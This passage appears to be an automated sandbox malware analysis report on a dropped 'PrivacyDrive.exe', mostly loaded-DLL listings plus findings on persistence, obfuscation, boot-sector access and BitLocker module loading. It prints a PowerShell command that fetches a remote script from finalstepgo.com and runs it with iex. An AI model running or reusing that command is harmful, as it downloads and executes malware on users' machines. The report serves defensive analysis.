Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: F:\PD3\bin\Release\PrivacyDrive.pdb source: PrivacyDrive.exe, 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000000.1815371616.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000003.1912706269.00000000052C4000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2149603912.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000000.1925315316.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000003.2019923963.0000000005386000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe.2.dr
Source:	Binary string: F:\PD3\bin\Release\PrivacyDrive.pdbN source: PrivacyDrive.exe, 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000000.1815371616.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000003.1912706269.00000000052C4000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2149603912.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000000.1925315316.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000003.2019923963.0000000005386000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe.2.dr

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text			Jump to behavior

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_0050E640 LoadLibraryW,GetProcAddress,VirtualAlloc,

4_2_0050E640

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0041E2B0 push ecx; mov dword ptr [esp], 42C00000h	4_2_0041E4B6
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0041E2B0 push ecx; mov dword ptr [esp], 42C00000h	4_2_0041E4F0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_004CB540 push ecx; mov dword ptr [esp], 3F800000h	4_2_004CB572
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0041E570 push ecx; mov dword ptr [esp], 3F800000h	4_2_0041E6F3
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00448697 pushfd ; iretd	4_2_004486A2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0041E7B0 push ecx; mov dword ptr [esp], 3F800000h	4_2_0041E99C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00426880 push ecx; mov dword ptr [esp], 3F800000h	4_2_004268B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_004CB9E0 push ecx; mov dword ptr [esp], 3F800000h	4_2_004CBA12
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0041EA60 push ecx; mov dword ptr [esp], 3F800000h	4_2_0041EC2B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00419A00 push ecx; mov dword ptr [esp], 3F800000h	4_2_00419A34
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_004ECB30 push ecx; mov dword ptr [esp], 00000000h	4_2_004ECB42
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00486BD0 push ecx; mov dword ptr [esp], 3F800000h	4_2_00486C06
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00486BD0 push ecx; mov dword ptr [esp], 3F800000h	4_2_00486C2D
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00502C4E push ecx; ret	4_2_00502C61
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00506C25 push ecx; ret	4_2_00506C38
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_0041BFA0 push ecx; mov dword ptr [esp], 3F800000h	4_2_0041BFEB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00FC2307 push ecx; retf	4_2_00FC2308
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_051E0905 push ecx; retf	4_2_051E0906
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00FB2307 push ecx; retf	8_2_00FB2308
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_01210905 push ecx; retf	8_2_01210906

Persistence and Installation Behavior

Contains functionality to infect the boot sector

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: RegCloseKey,DeviceIoControl,swprintf,CreateFileW,DeviceIoControl,_memset,DeviceIoControl,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d		4_2_0045D070
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: RegCloseKey,CreateFileW,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d		4_2_0045CD20

Powershell uses Background Intelligent Transfer Service (BITS)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Section loaded: \KnownDlls32\BitsProxy.dll

Jump to behavior

Drops PE files

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Jump to dropped file

Boot Survival

Contains functionality to infect the boot sector

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: RegCloseKey,DeviceIoControl,swprintf,CreateFileW,DeviceIoControl,_memset,DeviceIoControl,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d		4_2_0045D070
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: RegCloseKey,CreateFileW,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d		4_2_0045CD20

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_0041CDA0 QueryServiceStatus,CloseServiceHandle,Sleep,QueryServiceStatus,StartServiceW,GetLastError,Sleep,

4_2_0041CDA0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RATU0Beb			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RATU0Beb			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_004CDA40 SendMessageW,GetWindowRect,IsIconic,GetWindowRect,PostMessageW,IsZoomed,	4_2_004CDA40
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00489C60 IsWindowVisible,IsIconic,PostMessageW,IsIconic,	4_2_00489C60
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00489C60 IsWindowVisible,IsIconic,PostMessageW,IsIconic,	4_2_00489C60
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00489D10 IsWindowVisible,IsIconic,SendMessageW,IsIconic,SendMessageW,ShowWindow,IsWindow,IsWindow,IsWindow,IsWindow,PostMessageW,	4_2_00489D10
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00489D10 IsWindowVisible,IsIconic,SendMessageW,IsIconic,SendMessageW,ShowWindow,IsWindow,IsWindow,IsWindow,IsWindow,PostMessageW,	4_2_00489D10
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00417E90 IsWindow,GetWindowRect,IsWindow,IsWindowVisible,IsIconic,GetWindowRect,SetWindowPos,	4_2_00417E90

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
